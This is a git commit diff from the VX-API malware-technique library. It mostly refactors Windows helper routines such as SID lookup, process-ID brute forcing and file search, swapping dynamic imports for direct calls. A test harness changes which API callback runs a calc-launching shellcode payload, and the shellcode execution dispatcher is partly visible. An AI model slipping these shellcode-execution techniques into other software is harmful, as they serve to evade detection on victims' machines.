mirror of https://github.com/vxunderground/VX-API
vxunderground
parent
cc8255f356
commit
97ee6fcb92
|
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.298
|
||||
Version: 2.0.310
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
|
|
|||
|
|
@ -47,8 +47,6 @@ EXIT_ROUTINE:
|
|||
|
||||
HRESULT UnusedSubroutineGetShellViewForDesktop(REFIID Riid, PVOID* ShellView)
|
||||
{
|
||||
IUNKNOWN_QUERYSERVICE QueryServiceUsingIUnknown = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
HRESULT Result = S_OK;
|
||||
IShellWindows* Windows = NULL;
|
||||
HWND hWnd;
|
||||
|
|
@ -58,14 +56,6 @@ HRESULT UnusedSubroutineGetShellViewForDesktop(REFIID Riid, PVOID* ShellView)
|
|||
IShellView* View = NULL;
|
||||
*ShellView = NULL;
|
||||
|
||||
hModule = LoadLibraryW(L"Shlwapi.dll");
|
||||
if (hModule == NULL)
|
||||
return E_FAIL;
|
||||
|
||||
QueryServiceUsingIUnknown = (IUNKNOWN_QUERYSERVICE)GetProcAddressA((DWORD64)hModule, (PCHAR)"IUnknown_QueryService");
|
||||
if(QueryServiceUsingIUnknown == NULL)
|
||||
return E_FAIL;
|
||||
|
||||
Result = CoCreateInstance(CLSID_ShellWindows, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&Windows));
|
||||
if (!SUCCEEDED(Result))
|
||||
return Result;
|
||||
|
|
@ -74,7 +64,7 @@ HRESULT UnusedSubroutineGetShellViewForDesktop(REFIID Riid, PVOID* ShellView)
|
|||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = QueryServiceUsingIUnknown(Dispatch, SID_STopLevelBrowser, IID_PPV_ARGS(&Browser));
|
||||
Result = IUnknown_QueryService(Dispatch, SID_STopLevelBrowser, IID_PPV_ARGS(&Browser));
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
|
@ -89,9 +79,6 @@ HRESULT UnusedSubroutineGetShellViewForDesktop(REFIID Riid, PVOID* ShellView)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hModule)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6001)
|
||||
if (Windows)
|
||||
|
|
|
|||
|
|
@ -47,63 +47,8 @@ typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
|
|||
|
||||
|
||||
|
||||
/*******************************************
|
||||
SHLWAPI IMPORT
|
||||
*******************************************/
|
||||
typedef LPWSTR(WINAPI* PATHCOMBINEA)(LPCSTR, LPCSTR, LPCSTR);
|
||||
typedef LPWSTR(WINAPI* PATHCOMBINEW)(LPCWSTR, LPCWSTR, LPCWSTR);
|
||||
typedef HRESULT(WINAPI* IUNKNOWN_QUERYSERVICE)(IUnknown*, REFGUID, REFIID, PVOID*);
|
||||
typedef VOID(WINAPI* PATHSTRIPPATHW)(LPWSTR);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
URLMON IMPORT
|
||||
*******************************************/
|
||||
typedef HRESULT(WINAPI* URLDOWNLOADFILEA)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
|
||||
typedef HRESULT(WINAPI* URLDOWNLOADFILEW)(LPUNKNOWN, LPCTSTR, LPCTSTR, DWORD, LPBINDSTATUSCALLBACK);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
SHELL32 IMPORT
|
||||
*******************************************/
|
||||
|
||||
typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
|
||||
typedef HRESULT(WINAPI* CDEFFOLDERMENU_CREATE2)(PVOID, HWND, UINT, PVOID, PVOID, LPVOID, UINT, PHKEY, PVOID*);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
WTSAPI32 IMPORT
|
||||
*******************************************/
|
||||
typedef BOOL(WINAPI* WTSENUMERATEPROCESSES)(HANDLE, DWORD, DWORD, PWTS_PROCESS_INFOW*, PDWORD);
|
||||
typedef VOID(WINAPI* WTSFREEMEMORY)(PVOID);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
ADVAPI32 IMPORT
|
||||
*******************************************/
|
||||
typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDW)(PSID, LPWSTR*);
|
||||
typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDA)(PSID, LPSTR*);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
CRYPT32 IMPORT
|
||||
*******************************************/
|
||||
typedef BOOL(WINAPI* CERTENUMSYSTEMSTORE)(DWORD, PVOID, PVOID, PFN_CERT_ENUM_SYSTEM_STORE);
|
||||
typedef BOOL(WINAPI* CERTENUMSYSTEMSTORELOCATION)(DWORD, PVOID, PFN_CERT_ENUM_SYSTEM_STORE_LOCATION);
|
||||
typedef HCERTSTORE(WINAPI* CERTOPENSTORE)(LPCSTR, DWORD, HCRYPTPROV_LEGACY, DWORD, PVOID);
|
||||
typedef PCCERT_CHAIN_CONTEXT(WINAPI* CERTFINDCHAININSTORE)(HCERTSTORE, DWORD, DWORD, DWORD, PVOID, PCCERT_CHAIN_CONTEXT);
|
||||
typedef BOOL(WINAPI* CERTCLOSESTORE)(HCERTSTORE, DWORD);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
DBGHELP IMPORT
|
||||
*******************************************/
|
||||
typedef BOOL(WINAPI* SYMINITIALIZEW)(HANDLE, PCWSTR, BOOL);
|
||||
typedef BOOL(WINAPI* SYMCLEANUP)(HANDLE);
|
||||
typedef BOOL(WINAPI* ENUMDIRTREEW)(HANDLE, PCWSTR, PCWSTR, PWSTR, LPVOID, PVOID);
|
||||
typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
|
||||
|
|
@ -12,23 +12,13 @@ DWORD GetTokenInformationBufferSize(HANDLE hToken)
|
|||
|
||||
LPWSTR GetCurrentUserSidW(VOID)
|
||||
{
|
||||
CONVERTSIDTOSTRINGSIDW ConvertSidToStringSidW;
|
||||
PSID Sid = NULL;
|
||||
PTOKEN_GROUPS TokenGroup = NULL;
|
||||
DWORD dwError = ERROR_SUCCESS, dwIndex = ERROR_SUCCESS;
|
||||
BOOL bFlag = FALSE;
|
||||
LPWSTR pSid = NULL;
|
||||
HMODULE hAdvapi = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
hAdvapi = TryLoadDllMultiMethodW((PWCHAR)L"Advapi32.dll");
|
||||
if (hAdvapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ConvertSidToStringSidW = (CONVERTSIDTOSTRINGSIDW)GetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidW");
|
||||
if (!ConvertSidToStringSidW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
|
|
@ -79,9 +69,6 @@ EXIT_ROUTINE:
|
|||
if (Sid)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Sid);
|
||||
|
||||
if (hAdvapi)
|
||||
FreeLibrary(hAdvapi);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
||||
|
|
@ -90,23 +77,13 @@ EXIT_ROUTINE:
|
|||
|
||||
LPSTR GetCurrentUserSidA(VOID)
|
||||
{
|
||||
CONVERTSIDTOSTRINGSIDA ConvertSidToStringSidA;
|
||||
PSID Sid = NULL;
|
||||
PTOKEN_GROUPS TokenGroup = NULL;
|
||||
DWORD dwError = ERROR_SUCCESS, dwIndex = ERROR_SUCCESS;
|
||||
BOOL bFlag = FALSE;
|
||||
LPSTR pSid = NULL;
|
||||
HMODULE hAdvapi = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
hAdvapi = TryLoadDllMultiMethodW((PWCHAR)L"Advapi32.dll");
|
||||
if (hAdvapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ConvertSidToStringSidA = (CONVERTSIDTOSTRINGSIDA)GetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidA");
|
||||
if (!ConvertSidToStringSidA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
|
|
@ -157,9 +134,6 @@ EXIT_ROUTINE:
|
|||
if (Sid)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Sid);
|
||||
|
||||
if (hAdvapi)
|
||||
FreeLibrary(hAdvapi);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
||||
|
|
|
|||
|
|
@ -5,19 +5,16 @@ DWORD GetPidFromPidBruteForcingW(_In_ PWCHAR ProcessNameWithExtension)
|
|||
DWORD ProcessId = ERROR_SUCCESS;
|
||||
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bUnload = FALSE;
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
if (!hModule)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtQuerySystemInformation || !PathStripPathW)
|
||||
if (!NtQuerySystemInformation)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwProcessIdAddress = 0x00000008; dwProcessIdAddress < 0xFFFFFFFC; dwProcessIdAddress += 0x00000004)
|
||||
|
|
@ -45,9 +42,6 @@ DWORD GetPidFromPidBruteForcingW(_In_ PWCHAR ProcessNameWithExtension)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
||||
|
|
@ -56,8 +50,7 @@ DWORD GetPidFromPidBruteForcingA(_In_ PCHAR ProcessNameWithExtension)
|
|||
DWORD ProcessId = ERROR_SUCCESS;
|
||||
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bUnload = FALSE;
|
||||
WCHAR BinaryNameString[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
|
|
@ -65,14 +58,12 @@ DWORD GetPidFromPidBruteForcingA(_In_ PCHAR ProcessNameWithExtension)
|
|||
goto EXIT_ROUTINE;
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
if (!hModule)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtQuerySystemInformation || !PathStripPathW)
|
||||
if (!NtQuerySystemInformation)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwProcessIdAddress = 0x00000008; dwProcessIdAddress < 0xFFFFFFFC; dwProcessIdAddress += 0x00000004)
|
||||
|
|
@ -100,8 +91,5 @@ DWORD GetPidFromPidBruteForcingA(_In_ PCHAR ProcessNameWithExtension)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
|
@ -6,29 +6,25 @@ DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension)
|
|||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
HANDLE hDevice = NULL;
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
|
||||
|
||||
NTCREATEFILE NtCreateFile = NULL;
|
||||
NTCLOSE NtClose = NULL;
|
||||
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
if (!hModule)
|
||||
return 0;
|
||||
|
||||
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation)
|
||||
return 0;
|
||||
|
||||
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
|
||||
|
|
@ -89,9 +85,6 @@ EXIT_ROUTINE:
|
|||
if (hDevice)
|
||||
NtClose(hDevice);
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
||||
|
|
@ -101,7 +94,7 @@ DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension)
|
|||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
HANDLE hDevice = NULL;
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
|
||||
|
|
@ -110,23 +103,20 @@ DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension)
|
|||
NTCLOSE NtClose = NULL;
|
||||
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
|
||||
if (CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension) == 0))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
if (!hModule)
|
||||
return 0;
|
||||
|
||||
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation)
|
||||
return 0;
|
||||
|
||||
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
|
||||
|
|
@ -187,8 +177,5 @@ EXIT_ROUTINE:
|
|||
if (hDevice)
|
||||
NtClose(hDevice);
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
|
@ -5,33 +5,9 @@
|
|||
DWORD GetPidFromWindowsTerminalServiceW(_In_ PWCHAR BinaryNameWithFileExtension)
|
||||
{
|
||||
PWTS_PROCESS_INFOW ProcessInformation = NULL;
|
||||
WTSFREEMEMORY WtsFreeMemory = NULL;
|
||||
WTSENUMERATEPROCESSES WtsEnumerateProcessesW;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwNumberOfProcesses = ERROR_SUCCESS;
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bUnload = FALSE;
|
||||
|
||||
if (!IsDllLoadedW(L"Wtsapi32.dll"))
|
||||
{
|
||||
hModule = LoadLibraryW(L"Wtsapi32.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bUnload = TRUE;
|
||||
}
|
||||
else {
|
||||
hModule = GetModuleHandleEx2W(L"Wtsapi32.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
WtsEnumerateProcessesW = (WTSENUMERATEPROCESSES)GetProcAddressW((DWORD64)hModule, L"WTSEnumerateProcessesW");
|
||||
WtsFreeMemory = (WTSFREEMEMORY)GetProcAddressW((DWORD64)hModule, L"WTSFreeMemory");
|
||||
|
||||
if (!WtsEnumerateProcessesW || !WtsFreeMemory)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WtsEnumerateProcessesW(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &ProcessInformation, &dwNumberOfProcesses))
|
||||
if (!WTSEnumerateProcessesW(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &ProcessInformation, &dwNumberOfProcesses))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (ProcessInformation == NULL)
|
||||
|
|
@ -48,11 +24,8 @@ DWORD GetPidFromWindowsTerminalServiceW(_In_ PWCHAR BinaryNameWithFileExtension)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (bUnload)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
if (ProcessInformation)
|
||||
WtsFreeMemory(ProcessInformation);
|
||||
WTSFreeMemory(ProcessInformation);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
|
@ -60,37 +33,13 @@ EXIT_ROUTINE:
|
|||
DWORD GetPidFromWindowsTerminalServiceA(_In_ PCHAR BinaryNameWithFileExtension)
|
||||
{
|
||||
PWTS_PROCESS_INFOW ProcessInformation = NULL;
|
||||
WTSFREEMEMORY WtsFreeMemory = NULL;
|
||||
WTSENUMERATEPROCESSES WtsEnumerateProcessesW;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwNumberOfProcesses = ERROR_SUCCESS;
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bUnload = FALSE;
|
||||
WCHAR Buffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CharStringToWCharString(Buffer, BinaryNameWithFileExtension, StringLengthA(BinaryNameWithFileExtension)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!IsDllLoadedW(L"Wtsapi32.dll"))
|
||||
{
|
||||
hModule = LoadLibraryW(L"Wtsapi32.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bUnload = TRUE;
|
||||
}
|
||||
else {
|
||||
hModule = GetModuleHandleEx2W(L"Wtsapi32.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
WtsEnumerateProcessesW = (WTSENUMERATEPROCESSES)GetProcAddressW((DWORD64)hModule, L"WTSEnumerateProcessesW");
|
||||
WtsFreeMemory = (WTSFREEMEMORY)GetProcAddressW((DWORD64)hModule, L"WTSFreeMemory");
|
||||
|
||||
if (!WtsEnumerateProcessesW || !WtsFreeMemory)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WtsEnumerateProcessesW(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &ProcessInformation, &dwNumberOfProcesses))
|
||||
if (!WTSEnumerateProcessesW(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &ProcessInformation, &dwNumberOfProcesses))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (ProcessInformation == NULL)
|
||||
|
|
@ -107,11 +56,8 @@ DWORD GetPidFromWindowsTerminalServiceA(_In_ PCHAR BinaryNameWithFileExtension)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (bUnload)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
if (ProcessInformation)
|
||||
WtsFreeMemory(ProcessInformation);
|
||||
WTSFreeMemory(ProcessInformation);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
|
@ -982,13 +982,6 @@ typedef struct _PROC_THREAD_ATTRIBUTE_LIST {
|
|||
struct _PROC_THREAD_ATTRIBUTE Attributes[1];
|
||||
}PROC_THREAD_ATTRIBUTE_LIST, * PPROC_THREAD_ATTRIBUTE_LIST;
|
||||
|
||||
typedef struct _WTS_PROCESS_INFOW {
|
||||
DWORD SessionId;
|
||||
DWORD ProcessId;
|
||||
LPWSTR pProcessName;
|
||||
PSID pUserSid;
|
||||
} WTS_PROCESS_INFOW, * PWTS_PROCESS_INFOW;
|
||||
|
||||
typedef enum _KEY_VALUE_INFORMATION_CLASS {
|
||||
KeyValueBasicInformation,
|
||||
KeyValueFullInformation,
|
||||
|
|
@ -1127,5 +1120,4 @@ typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION{
|
|||
ULONG_PTR ProcessIdList[1];
|
||||
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;
|
||||
|
||||
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
|
||||
|
||||
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
|
||||
|
|
@ -45,7 +45,7 @@ int main(VOID)
|
|||
SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
Sei.Payload = GlobalOpenCalcPayload;
|
||||
Sei.dwLengthOfPayloadInBytes = 277;
|
||||
Sei.MethodEnum = E_MESSAGEBOXINDIRECT;
|
||||
Sei.MethodEnum = E_ENUMDIRTREEW;
|
||||
|
||||
ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
//MpfComMonitorChromeSessionOnce();
|
||||
|
|
|
|||
|
|
@ -5,16 +5,13 @@ PVOID UserDefinedCallbackRoutineA(LPCSTR Path)
|
|||
return 0;
|
||||
}
|
||||
|
||||
BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID pfnPathCombineW)
|
||||
BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern)
|
||||
{
|
||||
PATHCOMBINEA PathCombineA = (PATHCOMBINEA)pfnPathCombineW;
|
||||
|
||||
HANDLE HeapHandle = GetProcessHeapFromTeb();
|
||||
CHAR szFullPattern[MAX_PATH] = { 0 };
|
||||
WIN32_FIND_DATAA FindData = { 0 };
|
||||
HANDLE FindHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
|
||||
if (PathCombineA(szFullPattern, Path, "*") == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
|
@ -36,7 +33,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
|
|||
if (PathCombineA(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
UnusedSubroutineRecursiveFindFileMainA(szFullPattern, Pattern, PathCombineA);
|
||||
UnusedSubroutineRecursiveFindFileMainA(szFullPattern, Pattern);
|
||||
}
|
||||
|
||||
} while (FindNextFileA(FindHandle, &FindData));
|
||||
|
|
@ -83,27 +80,7 @@ EXIT_ROUTINE:
|
|||
|
||||
BOOL RecursiveFindFileA(_In_ LPCSTR Path, _In_ LPCSTR Pattern)
|
||||
{
|
||||
PATHCOMBINEA PathCombineA = NULL;
|
||||
HMODULE hShlwapi = NULL;
|
||||
BOOL bIsNewlyLoaded = FALSE;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"Shlwapi.dll");
|
||||
if (hShlwapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
PathCombineA = (PATHCOMBINEA)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
if (PathCombineA == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = UnusedSubroutineRecursiveFindFileMainA(Path, Pattern, PathCombineA);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hShlwapi != NULL)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return bFlag;
|
||||
return UnusedSubroutineRecursiveFindFileMainA(Path, Pattern);
|
||||
}
|
||||
|
||||
PVOID UserDefinedCallbackRoutineW(LPCWSTR Path)
|
||||
|
|
@ -111,10 +88,8 @@ PVOID UserDefinedCallbackRoutineW(LPCWSTR Path)
|
|||
return 0;
|
||||
}
|
||||
|
||||
BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID pfnPathCombineW)
|
||||
BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern)
|
||||
{
|
||||
PATHCOMBINEW PathCombineW = (PATHCOMBINEW)pfnPathCombineW;
|
||||
|
||||
HANDLE HeapHandle = GetProcessHeapFromTeb();
|
||||
WCHAR szFullPattern[MAX_PATH] = { 0 };
|
||||
WIN32_FIND_DATAW FindData = { 0 };
|
||||
|
|
@ -141,7 +116,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
|
|||
if (PathCombineW(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
UnusedSubroutineRecursiveFindFileMainW(szFullPattern, Pattern, PathCombineW);
|
||||
UnusedSubroutineRecursiveFindFileMainW(szFullPattern, Pattern);
|
||||
}
|
||||
|
||||
} while (FindNextFileW(FindHandle, &FindData));
|
||||
|
|
@ -188,7 +163,6 @@ EXIT_ROUTINE:
|
|||
|
||||
BOOL RecursiveFindFileW(_In_ LPCWSTR Path, _In_ LPCWSTR Pattern)
|
||||
{
|
||||
PATHCOMBINEW PathCombineW = NULL;
|
||||
HMODULE hShlwapi = NULL;
|
||||
BOOL bIsNewlyLoaded = FALSE;
|
||||
BOOL bFlag = FALSE;
|
||||
|
|
@ -197,11 +171,7 @@ BOOL RecursiveFindFileW(_In_ LPCWSTR Path, _In_ LPCWSTR Pattern)
|
|||
if (hShlwapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
PathCombineW = (PATHCOMBINEW)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
if (PathCombineW == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = UnusedSubroutineRecursiveFindFileMainW(Path, Pattern, PathCombineW);
|
||||
bFlag = UnusedSubroutineRecursiveFindFileMainW(Path, Pattern);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
|
|
|
|||
|
|
@ -17,18 +17,9 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
{
|
||||
case E_CDEFFOLDERMENU_CREATE2:
|
||||
{
|
||||
CDEFFOLDERMENU_CREATE2 CDefFolderMenu_Create2 = NULL;
|
||||
PVOID ContextMenuRequired = NULL;
|
||||
IContextMenu* ContextMenuRequired = NULL;
|
||||
